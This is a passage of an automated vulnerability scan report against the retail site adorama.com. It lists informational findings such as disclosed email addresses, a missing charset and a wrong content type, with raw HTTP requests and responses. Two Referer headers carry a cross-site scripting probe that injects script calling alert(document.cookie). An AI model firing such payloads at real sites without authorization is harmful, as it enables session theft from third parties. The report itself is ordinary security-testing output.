You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.adorama.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:25 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...
<a href="http://www.adorama.com/catalog.tpl?op=process&func=contact_form" onclick="window.open('/catalog.tpl?op=process&func=contact_form&sendto=webmaster@adorama.com', 'popup', 'width=470,height=550');return false;" class="FooterLink">
...[SNIP]...

7.2. http://www.adorama.com/ICA1DM4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ICA1DM4.html

Issue detail

The following email address was disclosed in the response:

Request

GET /ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AJAXrefby=become; sterm=; refby=become; header_refby=become; Session_Refby=become

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:08:53 GMT
Connection: close
Set-Cookie: ABFlag=89; expires=Wed, 26-Dec-2040 04:08:51 GMT; path=/
Set-Cookie: sub=; path=/
Set-Cookie: sterm=; path=/
Set-Cookie: refby=; path=/
Set-Cookie: ETjobid=; path=/
Content-Length: 91600

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<a href="http://www.adorama.com/catalog.tpl?op=process&func=contact_form" onclick="window.open('/catalog.tpl?op=process&func=contact_form&sendto=webmaster@adorama.com', 'popup', 'width=470,height=550');return false;" class="FooterLink">
...[SNIP]...

7.3. http://www.adorama.com/ainc/emailCheck.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ainc/emailCheck.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ainc/emailCheck.js HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Referer: http://www.adorama.com/Catalog.tpl?op=itemlist&cat1=Video&cat2=Consumer%20Video&cat3=Camcorders&feature2=HD&12d67%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2de6d889351=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: header_refby=become; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; __utmv=113083348.%2FExperiment%2FHPN%2FOld; ci_tid=12420-null-6180938567201011622833183; ci_tag=become; KeepLoggedIn=false; sweeps=T; sid3=20101225230855189ky; il_image_view=yes; ABFlag=89

Response

HTTP/1.1 200 OK
ETag: "b8d8bc9432efc51:2c6"
Server: Microsoft-IIS/6.0
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 22 Nov 2005 07:01:37 GMT
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 15:18:48 GMT
Connection: close
Content-Length: 2853


// Changes: Sandeep V. Tamhankar (stamhankar@hotmail.com)
// This script and many more are available free online at
// The JavaScript Source!! http://javascript.internet.com
// Begin

//SN - Added Silent Parameter - so that we can just check the e
...[SNIP]...

7.4. http://www.adorama.com/ainc/overlib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ainc/overlib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ainc/overlib.js HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Referer: http://www.adorama.com/ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AJAXrefby=become; header_refby=become; Session_Refby=become; ABFlag=89; sub=; sterm=; refby=; ETjobid=

Response

HTTP/1.1 200 OK
ETag: "e8d84866d554c51:2c6"
Server: Microsoft-IIS/6.0
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 09 May 2005 20:26:37 GMT
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:08:54 GMT
Connection: close
Content-Length: 27122

//\//////////////////////////////////////////////////////////////////////////////////
//\ overLIB 3.51 -- This notice must remain untouched at all times.
//\ Copyright Erik Bosrup 1998-2002. All rights reserved.
//\
//\ By Erik Bosrup (erik@bosrup.com). Last modified 2002-11-01.
//\ Portions by Dan Steinman (dansteinman.com). Additions by other people are
//\ listed on the overLIB homepage.
//\
//\ Get the latest version at http://www.bosru
...[SNIP]...

7.5. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The following email address was disclosed in the response:

Request

GET /catalog.tpl?op=process&func=contact_form&sendto=webmaster@adorama.com HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:33:13 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:33:13 GMT
Content-Length: 5173
Connection: close
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
<option value="info@adorama.com"        >info@adorama.com</option>
...[SNIP]...

7.6. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The following email addresses were disclosed in the response:

Request

GET /catalog.tpl?op=Process&func=SendGiftCert HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:33 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 36386

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
<span>Please enter valid email address (email@yoursite.com)</span>
...[SNIP]...
<a href="http://www.adorama.com/catalog.tpl?op=process&func=contact_form" onclick="window.open('/catalog.tpl?op=process&func=contact_form&sendto=webmaster@adorama.com', 'popup', 'width=470,height=550');return false;" class="FooterLink">
...[SNIP]...

7.7. http://www.adorama.com/ps/catalog.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ps/catalog.pl

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ps/catalog.pl?op=trackorder_login\ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 14
X-Powered-By: ASP.NET
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32891

<HTML>
   <HEAD>
       <TITLE></TITLE>
       
           
<LINK rel="stylesheet" href="/Ainc/stylesheet.css">
<!--Begin Preload Script -->
<SCRIPT TYPE="text/javascript">
<!--

function n
...[SNIP]...
<a href="mailto:info@adorama.com">
...[SNIP]...
<A href="mailto:info@adoramacamera.com" class="FooterLink">
...[SNIP]...
<A href="mailto:webmaster@adoramacamera.com" class="FooterLink">
...[SNIP]...

7.8. http://www.adorama.com/searchsite/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /searchsite/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /searchsite/default.aspx HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 17
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:31:25 GMT
Content-Length: 27252
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="http://ww
...[SNIP]...
<a href="http://www.adorama.com/catalog.tpl?op=process&func=contact_form" onclick="window.open('/catalog.tpl?op=process&func=contact_form&sendto=webmaster@adorama.com', 'popup', 'width=470,height=550');return false;" class="FooterLink">
...[SNIP]...

8. HTML does not specify charset  previous  next
There are 9 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


8.1. http://www.adorama.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /

Request

GET / HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:25 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...

8.2. http://www.adorama.com/Experiment/HPN/Old  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /Experiment/HPN/Old

Request

GET /Experiment/HPN/Old HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 404 Not Found
Status: 404
Expires: Sun, 26 Dec 2010 04:33:33 GMT
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 28229
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:33:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...

8.3. http://www.adorama.com/FixCookie.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /FixCookie.tpl

Request

GET /FixCookie.tpl HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Referer: http://www.adorama.com/Catalog.tpl?op=itemlist&cat1=Video&cat2=Consumer%20Video&cat3=Camcorders&feature2=HD&12d67%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2de6d889351=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: header_refby=become; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; __utmv=113083348.%2FExperiment%2FHPN%2FOld; ci_tid=12420-null-6180938567201011622833183; ci_tag=become; KeepLoggedIn=false; sweeps=T; sid3=20101225230855189ky; il_image_view=yes; ABFlag=89

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 15:18:49 GMT
Mime-Version: 1.0
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 15:18:48 GMT
Connection: close
Content-Length: 861


               <script>
var cookies =[];
var Sid3Test = /sid3/
var split = document.cookie.split(';');
for (var i = 0; i < split.length; i++) {
   
...[SNIP]...

8.4. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Request

GET /catalog.tpl HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:29 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...

8.5. http://www.adorama.com/catlite.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catlite.tpl

Request

GET /catlite.tpl HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:33:15 GMT
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 97
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:33:15 GMT
Connection: close


<HTML>


       The page you requested was not found.

8.6. http://www.adorama.com/ecommerce/images/icon_shoppingcart.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ecommerce/images/icon_shoppingcart.gif/

Request

GET /ecommerce/images/icon_shoppingcart.gif/ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 404 Not Found
Status: 404
Expires: Sun, 26 Dec 2010 04:33:33 GMT
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 28229
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:33:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...

8.7. http://www.adorama.com/ecommerce/images/icon_wishlist.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ecommerce/images/icon_wishlist.gif/

Request

GET /ecommerce/images/icon_wishlist.gif/ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 404 Not Found
Status: 404
Expires: Sun, 26 Dec 2010 04:33:35 GMT
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 28231
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:33:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...

8.8. http://www.adorama.com/ps/catalog.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ps/catalog.pl

Request

GET /ps/catalog.pl HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 502 Bad Gateway
Server: Microsoft-IIS/6.0
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 232
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:33:33 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Error in CGI Application</title></head>
<body><h1>CGI Error</h1>The specified CGI application misbehaved by not returning a complete set of HT
...[SNIP]...

8.9. http://www.adorama.com/searchsite/default.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /searchsite/default.aspx

Request

GET /searchsite/default.aspx?searchinfo=Sony%20SXS&category=4294965949 1012 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 20
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:31:27 GMT
Connection: close

<h1>Bad Request</h1>

9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /searchsite/default.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /searchsite/default.aspx?searchinfo=Sony%20SXS&category=4294965949 1012 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 20
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:31:27 GMT
Connection: close

<h1>Bad Request</h1>

Report generated by XSS.CX at Mon Dec 27 10:29:25 CST 2010.